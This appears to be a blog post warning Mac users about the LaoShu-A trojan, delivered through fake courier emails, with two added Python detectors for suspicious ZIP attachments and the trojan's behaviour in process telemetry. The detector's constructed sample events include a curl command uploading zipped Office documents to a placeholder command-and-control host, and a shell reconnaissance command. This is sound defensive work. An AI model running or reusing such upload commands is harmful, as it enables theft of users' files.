Dangerous Trojan For Mac Makes The Rounds

If you are one of those Mac users who still believes that you can’t get infected by viruses, malware, or anything else, then you need to pay attention to this.

The idea is surprisingly simple: you receive an email that claims to be a courier company that is having trouble delivering your article.

In the email is a link to, or an attachment containing, what purports to be a tracking note for the item.

You are invited to review the relevant document and respond so that delivery can be completed.

Except that the document isn’t a document at all. It’s a Trojan that downloads malicious code depending on what OS you’re running:

If you are on a mobile device, the server delivers an error message.

If you are using a desktop browser that isn’t Safari, you receive a ZIP file containing a Windows program detected by Sophos Anti-Virus as Mal/VBCheMan-C, a vague relative of the Zbot or Zeus malware.

But if you are using Safari, you receive Mac malware, delivered as an Application bundle packaged inside a ZIP file.
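The two payloads described above can be told apart from a supposed "tracking note" without opening anything, because both leave tell-tale structure inside the ZIP: a Windows program starts with the DOS/PE `MZ` signature, and a Mac application bundle is a directory ending in `.app` with an executable under `Contents/MacOS/`. The following is an added example of such an attachment check, not code from the post or from Sophos; the archives it inspects are constructed in memory and the file names (`Tracking Note.app`, `Tracking_Note.exe`) are placeholders rather than indicators taken from the post.

```python
"""Inspect a ZIP e-mail attachment for an executable disguised as a tracking note.

Added example. A PE executable begins with the 'MZ' signature; a Mac app bundle is
a ".app" directory carrying an executable under Contents/MacOS/. The archives
built below are constructed test data with placeholder names.
"""
import io
import zipfile


def build_zip(members: dict[str, bytes]) -> bytes:
    """Build an in-memory ZIP from {path: content} (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed lookalikes of the two payload shapes described in the post.
MAC_LURE = build_zip({
    "Tracking Note.app/Contents/Info.plist": b'<plist version="1.0"/>',
    "Tracking Note.app/Contents/MacOS/Tracking Note": b"not-a-real-mach-o",
})
WINDOWS_LURE = build_zip({"Tracking_Note.exe": b"MZ" + b"\x00" * 62})
BENIGN_DOC = build_zip({"tracking_note.pdf": b"%PDF-1.4 placeholder"})


def find_app_bundles(zip_bytes: bytes) -> list[str]:
    """Names of .app bundles that carry an executable under Contents/MacOS/."""
    bundles = set()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            parts = name.split("/")
            for i, part in enumerate(parts):
                if part.lower().endswith(".app"):
                    rest = parts[i + 1:]
                    # Exactly <bundle>/Contents/MacOS/<non-empty executable name>
                    if rest[:2] == ["Contents", "MacOS"] and len(rest) == 3 and rest[2]:
                        bundles.add("/".join(parts[: i + 1]))
                    break
    return sorted(bundles)


def find_pe_files(zip_bytes: bytes) -> list[str]:
    """Members whose first two bytes are the DOS/PE 'MZ' signature, whatever the name."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                if fh.read(2) == b"MZ":
                    hits.append(info.filename)
    return hits


def classify(zip_bytes: bytes) -> str:
    """Return 'mac-app-bundle', 'windows-executable' or 'no-executable'."""
    if find_app_bundles(zip_bytes):
        return "mac-app-bundle"
    if find_pe_files(zip_bytes):
        return "windows-executable"
    return "no-executable"


if __name__ == "__main__":
    for label, blob in (("mac", MAC_LURE), ("windows", WINDOWS_LURE), ("pdf", BENIGN_DOC)):
        print(label, "->", classify(blob))
```

The bundle check looks at archive paths only, so it catches a bundle whose top-level name has been dressed up to look like a document, and the `MZ` check does not trust the member's extension. A mail gateway would run both on every ZIP before it reaches a user.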

Lovely. The Mac Trojan is a particularly nasty one called LaoShu-A:

LaoShu-A as good as hands control of your Mac over to the attackers, but its primary functions appear to be more closely associated with data stealing than with co-opting you into a traditional money-making botnet.

(You will often hear the term RAT, or Remote Access Trojan, rather than the more common term bot, used to describe this sort of malware.)

In other words, the attackers seem more concerned with digging around on your computer for what they can steal than with abusing your computer and your internet connection to aid and abet other cybercriminal activities.

Amongst other things, LaoShu-A contains code to:

  • Search for files with extensions such as DOC, DOCX, XLS, XLSX, PPT and PPTX.
  • ZIP those files.
  • Upload (exfiltrate) them to a server operated by the attackers.

However, this RAT also knows how to:

  • Download new files.
  • Run arbitrary shell commands.

For example, during our tests, LaoShu-A downloaded a second application that took a screenshot with OS X’s built-in screencapture command, and tried to exfiltrate the image it had just grabbed.
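The behaviour described in the quoted write-up (an app run from a downloaded ZIP that archives Office documents, takes a screenshot with the built-in screencapture tool, runs shell commands and uploads the results) forms a chain that process-execution telemetry can surface even when the binary itself is not yet recognised. The following is an added example of that correlation, not code from the post or from Sophos. The events it runs over are constructed to resemble what an endpoint monitor records (pid, parent pid, executable image, argv); the bundle path, the host name and the file names are placeholders.

```python
"""Flag the LaoShu-A style behaviour chain in process-execution telemetry.

Added example. Events below are constructed (not real telemetry); paths, host
name and file names are placeholders, not indicators from the post.
"""
from dataclasses import dataclass

OFFICE_EXTS = {"doc", "docx", "xls", "xlsx", "ppt", "pptx"}
# Where a freshly downloaded, ZIP-extracted app bundle typically lands.
UNTRUSTED_DIRS = ("/Downloads/", "/tmp/", "/private/tmp/")
# curl options that send a local file or body to a server.
CURL_UPLOAD_FLAGS = {"-F", "--form", "-T", "--upload-file", "-d", "--data", "--data-binary"}


@dataclass
class Event:
    ts: int           # seconds since start of the capture (constructed)
    pid: int
    ppid: int
    image: str        # full path of the executable
    argv: list[str]


def is_untrusted_bundle(image: str) -> bool:
    """An app bundle executable running from a download or temp location."""
    return ".app/Contents/MacOS/" in image and any(d in image for d in UNTRUSTED_DIRS)


def detect(events: list[Event]) -> dict[int, list[str]]:
    """Per suspicious parent pid, the behaviours observed among its children, in order."""
    images = {e.pid: e.image for e in events}
    staged: dict[int, set[str]] = {}       # files a parent's children wrote
    findings: dict[int, list[str]] = {}

    def note(ppid: int, what: str) -> None:
        if what not in findings.setdefault(ppid, []):
            findings[ppid].append(what)

    for e in sorted(events, key=lambda x: x.ts):
        if not is_untrusted_bundle(images.get(e.ppid, "")):
            continue                        # only children of a suspicious bundle
        tool = e.image.rsplit("/", 1)[-1]
        if tool == "zip":
            paths = [a for a in e.argv[1:] if not a.startswith("-")]
            # zip <archive> <inputs...>: flag when inputs are Office documents
            if paths and any(p.rsplit(".", 1)[-1].lower() in OFFICE_EXTS for p in paths[1:]):
                note(e.ppid, "archive-office-docs")
                staged.setdefault(e.ppid, set()).add(paths[0])
        elif tool == "screencapture":
            note(e.ppid, "screenshot")
            staged.setdefault(e.ppid, set()).add(e.argv[-1])
        elif tool == "curl" and CURL_UPLOAD_FLAGS & set(e.argv):
            joined = " ".join(e.argv)
            if any(p in joined for p in staged.get(e.ppid, ())):
                note(e.ppid, "upload-of-staged-file")
            else:
                note(e.ppid, "upload")
        elif tool in ("sh", "bash", "zsh") and "-c" in e.argv:
            note(e.ppid, "shell-command")
    return findings


def verdict(findings: dict[int, list[str]]) -> list[int]:
    """Parents showing at least two distinct steps of the chain."""
    return sorted(pid for pid, seen in findings.items() if len(seen) >= 2)


# Constructed sample: one suspicious bundle, one ordinary Terminal session.
BUNDLE = "/Users/alice/Downloads/Tracking Note.app/Contents/MacOS/Tracking Note"
TERMINAL = "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"
SAMPLE_EVENTS = [
    Event(0, 501, 1, BUNDLE, [BUNDLE]),
    Event(5, 502, 501, "/usr/bin/zip", ["zip", "-r", "/tmp/.out.zip", "Budget.xlsx", "Report.docx"]),
    Event(6, 503, 501, "/usr/bin/curl", ["curl", "-F", "file=@/tmp/.out.zip", "http://c2.example.invalid/up"]),
    Event(9, 504, 501, "/usr/sbin/screencapture", ["screencapture", "-x", "/tmp/.s.png"]),
    Event(10, 505, 501, "/bin/sh", ["sh", "-c", "id; uname -a"]),
    Event(20, 600, 1, TERMINAL, [TERMINAL]),
    Event(25, 601, 600, "/usr/bin/zip", ["zip", "backup.zip", "Notes.docx"]),  # benign
]

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for pid in verdict(found):
        print(pid, found[pid])
```

Gating on the parent's location keeps a user's own `zip` or `screencapture` from a Terminal session quiet, while the staged-file correlation ties the upload to the archive or screenshot created moments earlier by the same parent, which is the part of the chain that matters most.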

Now, the undelivered-package e-mail is not new. I have Apple Mail set to auto-delete these e-mails by default. And yes, Windows users are at risk here. But Mac users are at greater risk, as what’s delivered to the Mac is extremely dangerous. Thus you should be on the lookout for e-mails like these and avoid them at all costs. You’ll thank me for it.
